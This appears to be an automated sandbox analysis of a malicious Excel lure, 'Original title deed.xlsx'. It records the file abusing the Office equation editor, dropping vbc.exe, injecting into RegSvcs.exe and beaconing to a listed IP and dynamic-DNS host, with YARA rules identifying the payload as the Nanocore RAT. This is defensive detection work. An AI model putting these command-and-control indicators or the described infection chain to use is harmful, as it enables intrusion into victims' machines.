Source: unknown	TCP traffic detected without corresponding DNS query: 79.134.225.26
Source: unknown	TCP traffic detected without corresponding DNS query: 79.134.225.26
Source: unknown	TCP traffic detected without corresponding DNS query: 79.134.225.26
Source: unknown	TCP traffic detected without corresponding DNS query: 79.134.225.26
Source: unknown	TCP traffic detected without corresponding DNS query: 79.134.225.26
Source: unknown	TCP traffic detected without corresponding DNS query: 79.134.225.26
Source: unknown	TCP traffic detected without corresponding DNS query: 79.134.225.26
Source: unknown	TCP traffic detected without corresponding DNS query: 79.134.225.26
Source: unknown	TCP traffic detected without corresponding DNS query: 79.134.225.26
Source: unknown	TCP traffic detected without corresponding DNS query: 79.134.225.26
Source: unknown	TCP traffic detected without corresponding DNS query: 79.134.225.26
Source: unknown	TCP traffic detected without corresponding DNS query: 79.134.225.26
Source: unknown	TCP traffic detected without corresponding DNS query: 79.134.225.26
Source: unknown	TCP traffic detected without corresponding DNS query: 79.134.225.26
Source: unknown	TCP traffic detected without corresponding DNS query: 79.134.225.26
Source: unknown	TCP traffic detected without corresponding DNS query: 79.134.225.26
Source: unknown	TCP traffic detected without corresponding DNS query: 79.134.225.26
Source: unknown	TCP traffic detected without corresponding DNS query: 79.134.225.26
Source: unknown	TCP traffic detected without corresponding DNS query: 79.134.225.26
Source: unknown	TCP traffic detected without corresponding DNS query: 79.134.225.26
Source: unknown	TCP traffic detected without corresponding DNS query: 79.134.225.26
Source: unknown	TCP traffic detected without corresponding DNS query: 79.134.225.26
Source: unknown	TCP traffic detected without corresponding DNS query: 79.134.225.26
Source: unknown	TCP traffic detected without corresponding DNS query: 79.134.225.26
Source: unknown	TCP traffic detected without corresponding DNS query: 79.134.225.26
Source: unknown	TCP traffic detected without corresponding DNS query: 79.134.225.26
Source: unknown	TCP traffic detected without corresponding DNS query: 79.134.225.26

Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe

Code function: 5_2_004C2B6E WSARecv,

5_2_004C2B6E

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\DEE6A84C.emf

Jump to behavior

Source: global traffic

Source: unknown

DNS traffic detected: queries for: myhostisstillgood11.zapto.org

Source: RegSvcs.exe, 00000005.00000002.2597584693.0000000000780000.00000004.00000001.sdmp	String found in binary or memory: http://google.com
Source: RegSvcs.exe, 00000005.00000002.2599722592.0000000004F80000.00000002.00000001.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous.
Source: RegSvcs.exe, 00000005.00000002.2599722592.0000000004F80000.00000002.00000001.sdmp	String found in binary or memory: http://www.%s.comPA
Source: A830D3DD.emf.0.dr	String found in binary or memory: http://www.day.com/dam/1.0
Source: vbc.exe	String found in binary or memory: https://github.com/unguest
Source: vbc.exe.2.dr	String found in binary or memory: https://github.com/unguest9WinForms_RecursiveFormCreate5WinForms_SeeInnerExceptionGProperty
Source: vbc.exe, 00000004.00000002.2397412433.00000000026EB000.00000004.00000001.sdmp	String found in binary or memory: https://stackpath.bootstrapcdn.com/bootstrap/4.5.0/css/bootstrap.min.css

Source: RegSvcs.exe, 00000005.00000002.2597850360.0000000002100000.00000004.00000001.sdmp

Binary or memory string: RegisterRawInputDevices

E-Banking Fraud:

Yara detected Nanocore RAT

Show sources

Source: Yara match	File source: 00000005.00000002.2597850360.0000000002100000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.2597305465.0000000000402000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.2599211155.000000000387F000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.2399354927.00000000036B1000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: RegSvcs.exe PID: 2360, type: MEMORY
Source: Yara match	File source: 5.2.RegSvcs.exe.2100000.13.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.vbc.exe.3940110.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.RegSvcs.exe.3887649.23.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.RegSvcs.exe.3883020.24.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.RegSvcs.exe.3883020.24.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.RegSvcs.exe.2104629.14.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.vbc.exe.3940110.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.RegSvcs.exe.2100000.13.raw.unpack, type: UNPACKEDPE

System Summary:

Malicious sample detected (through community Yara rule)

Show sources

Source: 00000005.00000002.2597919023.0000000002200000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 00000005.00000002.2597850360.0000000002100000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 00000005.00000002.2597305465.0000000000402000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 00000005.00000002.2597305465.0000000000402000.00000040.00000001.sdmp, type: MEMORY	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 00000005.00000002.2597641186.0000000000820000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 00000005.00000002.2597438390.0000000000590000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 00000005.00000002.2597886423.0000000002160000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 00000005.00000002.2597584693.0000000000780000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 00000005.00000002.2597593122.0000000000790000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 00000005.00000002.2597600181.00000000007A0000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 00000005.00000002.2597411423.0000000000520000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 00000005.00000002.2597403893.0000000000500000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 00000005.00000002.2597470836.0000000000610000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 00000005.00000002.2597453930.00000000005B0000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 00000005.00000002.2598186375.0000000002691000.00000004.00000001.sdmp, type: MEMORY	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 00000005.00000002.2597464017.0000000000600000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 00000004.00000002.2399354927.00000000036B1000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 00000004.00000002.2399354927.00000000036B1000.00000004.00000001.sdmp, type: MEMORY	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: Process Memory Space: RegSvcs.exe PID: 2360, type: MEMORY	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: Process Memory Space: RegSvcs.exe PID: 2360, type: MEMORY	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 5.2.RegSvcs.exe.600000.6.raw.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 5.2.RegSvcs.exe.500000.2.raw.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 5.2.RegSvcs.exe.590000.4.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 5.2.RegSvcs.exe.2100000.13.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 5.2.RegSvcs.exe.2160000.16.raw.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 5.2.RegSvcs.exe.7a0000.10.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 5.2.RegSvcs.exe.590000.4.raw.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 5.2.RegSvcs.exe.7a0000.10.raw.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 5.2.RegSvcs.exe.26a6198.22.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 5.2.RegSvcs.exe.790000.9.raw.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 5.2.RegSvcs.exe.389b840.25.raw.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 5.2.RegSvcs.exe.780000.8.raw.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 5.2.RegSvcs.exe.820000.11.raw.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 4.2.vbc.exe.3940110.4.raw.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 4.2.vbc.exe.3940110.4.raw.unpack, type: UNPACKEDPE	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 5.2.RegSvcs.exe.220e8a4.18.raw.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 5.2.RegSvcs.exe.610000.7.raw.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 5.2.RegSvcs.exe.3887649.23.raw.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 5.2.RegSvcs.exe.820000.11.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 5.2.RegSvcs.exe.5b0000.5.raw.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 5.2.RegSvcs.exe.520000.3.raw.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 5.2.RegSvcs.exe.26b23d8.20.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 5.2.RegSvcs.exe.780000.8.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 5.2.RegSvcs.exe.790000.9.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 5.2.RegSvcs.exe.389b840.25.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 5.2.RegSvcs.exe.600000.6.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 5.2.RegSvcs.exe.520000.3.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 5.2.RegSvcs.exe.3883020.24.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 5.2.RegSvcs.exe.2160000.16.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 5.2.RegSvcs.exe.2200000.17.raw.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 5.2.RegSvcs.exe.2204c9f.19.raw.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 5.2.RegSvcs.exe.2200000.17.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 5.2.RegSvcs.exe.3883020.24.raw.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 5.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 5.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 5.2.RegSvcs.exe.2104629.14.raw.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 4.2.vbc.exe.3940110.4.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 4.2.vbc.exe.3940110.4.unpack, type: UNPACKEDPE	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 5.2.RegSvcs.exe.2100000.13.raw.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 5.2.RegSvcs.exe.26a6198.22.raw.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 5.2.RegSvcs.exe.26a6198.22.raw.unpack, type: UNPACKEDPE	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 5.2.RegSvcs.exe.26b23d8.20.raw.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 5.2.RegSvcs.exe.26b23d8.20.raw.unpack, type: UNPACKEDPE	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 5.2.RegSvcs.exe.26a1340.21.raw.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 5.2.RegSvcs.exe.26a1340.21.raw.unpack, type: UNPACKEDPE	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>

Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)

Show sources

Source: Screenshot number: 4	Screenshot OCR: Enable Content from the yellow bar above 23 24 25 " 26 27 i! : ". "1" _ " ~ 32 33 0 0 0 34
Source: Screenshot number: 8	Screenshot OCR: Enable Content from the yellow bar above 23 24 25 " 26 27 i! : ". "1" _ " ~ 32 33 0 0 0 34

Office equation editor drops PE file

Show sources

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\nd[1].exe			Jump to dropped file
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	File created: C:\Users\Public\vbc.exe			Jump to dropped file

Source: C:\Users\Public\vbc.exe	Memory allocated: 76E20000 page execute and read and write	Jump to behavior
Source: C:\Users\Public\vbc.exe	Memory allocated: 76D20000 page execute and read and write	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe	Memory allocated: 76E20000 page execute and read and write	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe	Memory allocated: 76D20000 page execute and read and write	Jump to behavior

Source: C:\Users\Public\vbc.exe	Code function: 4_2_004A0032 NtQuerySystemInformation,	4_2_004A0032
Source: C:\Users\Public\vbc.exe	Code function: 4_2_004A0006 NtQuerySystemInformation,	4_2_004A0006
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe	Code function: 5_2_004C114A NtQuerySystemInformation,	5_2_004C114A
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe	Code function: 5_2_004C110F NtQuerySystemInformation,	5_2_004C110F

Source: C:\Users\Public\vbc.exe	Code function: 4_2_00297542	4_2_00297542
Source: C:\Users\Public\vbc.exe	Code function: 4_2_00597489	4_2_00597489
Source: C:\Users\Public\vbc.exe	Code function: 4_2_00595160	4_2_00595160
Source: C:\Users\Public\vbc.exe	Code function: 4_2_00593198	4_2_00593198
Source: C:\Users\Public\vbc.exe	Code function: 4_2_0059262A	4_2_0059262A
Source: C:\Users\Public\vbc.exe	Code function: 4_2_005942B1	4_2_005942B1
Source: C:\Users\Public\vbc.exe	Code function: 4_2_00597048	4_2_00597048
Source: C:\Users\Public\vbc.exe	Code function: 4_2_0059BC68	4_2_0059BC68
Source: C:\Users\Public\vbc.exe	Code function: 4_2_00597038	4_2_00597038
Source: C:\Users\Public\vbc.exe	Code function: 4_2_0059B5C8	4_2_0059B5C8
Source: C:\Users\Public\vbc.exe	Code function: 4_2_005939A0	4_2_005939A0
Source: C:\Users\Public\vbc.exe	Code function: 4_2_00595E58	4_2_00595E58
Source: C:\Users\Public\vbc.exe	Code function: 4_2_0059BA50	4_2_0059BA50
Source: C:\Users\Public\vbc.exe	Code function: 4_2_00596E50	4_2_00596E50
Source: C:\Users\Public\vbc.exe	Code function: 4_2_00595E48	4_2_00595E48
Source: C:\Users\Public\vbc.exe	Code function: 4_2_00596E40	4_2_00596E40
Source: C:\Users\Public\vbc.exe	Code function: 4_2_005942C1	4_2_005942C1
Source: C:\Users\Public\vbc.exe	Code function: 4_2_00597298	4_2_00597298
Source: C:\Users\Public\vbc.exe	Code function: 4_2_00597288	4_2_00597288
Source: C:\Users\Public\vbc.exe	Code function: 4_2_00596B19	4_2_00596B19
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe	Code function: 5_2_003F3020	5_2_003F3020
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe	Code function: 5_2_003F2418	5_2_003F2418
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe	Code function: 5_2_003F38C8	5_2_003F38C8
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe	Code function: 5_2_003F9D20	5_2_003F9D20
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe	Code function: 5_2_003F9120	5_2_003F9120
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe	Code function: 5_2_003FEA80	5_2_003FEA80
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe	Code function: 5_2_003FC6F3	5_2_003FC6F3
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe	Code function: 5_2_003FC3E0	5_2_003FC3E0
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe	Code function: 5_2_003FB7E0	5_2_003FB7E0
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe	Code function: 5_2_003FC4A7	5_2_003FC4A7
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe	Code function: 5_2_003F30E7	5_2_003F30E7
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe	Code function: 5_2_003F9DE7	5_2_003F9DE7

Source: Original title deed.xlsx

OLE stream indicators for Word, Excel, PowerPoint, and Visio: all false

Source: 00000005.00000002.2597919023.0000000002200000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 00000005.00000002.2597919023.0000000002200000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 00000005.00000002.2597850360.0000000002100000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 00000005.00000002.2597850360.0000000002100000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 00000005.00000002.2597305465.0000000000402000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 00000005.00000002.2597305465.0000000000402000.00000040.00000001.sdmp, type: MEMORY	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 00000005.00000002.2597641186.0000000000820000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 00000005.00000002.2597641186.0000000000820000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 00000005.00000002.2597438390.0000000000590000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 00000005.00000002.2597438390.0000000000590000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 00000005.00000002.2597886423.0000000002160000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 00000005.00000002.2597886423.0000000002160000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 00000005.00000002.2597584693.0000000000780000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 00000005.00000002.2597584693.0000000000780000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 00000005.00000002.2597593122.0000000000790000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 00000005.00000002.2597593122.0000000000790000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 00000005.00000002.2597600181.00000000007A0000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 00000005.00000002.2597600181.00000000007A0000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 00000005.00000002.2597411423.0000000000520000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 00000005.00000002.2597411423.0000000000520000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 00000005.00000002.2597403893.0000000000500000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 00000005.00000002.2597403893.0000000000500000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 00000005.00000002.2597470836.0000000000610000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 00000005.00000002.2597470836.0000000000610000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 00000005.00000002.2597453930.00000000005B0000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 00000005.00000002.2597453930.00000000005B0000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 00000005.00000002.2598186375.0000000002691000.00000004.00000001.sdmp, type: MEMORY	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
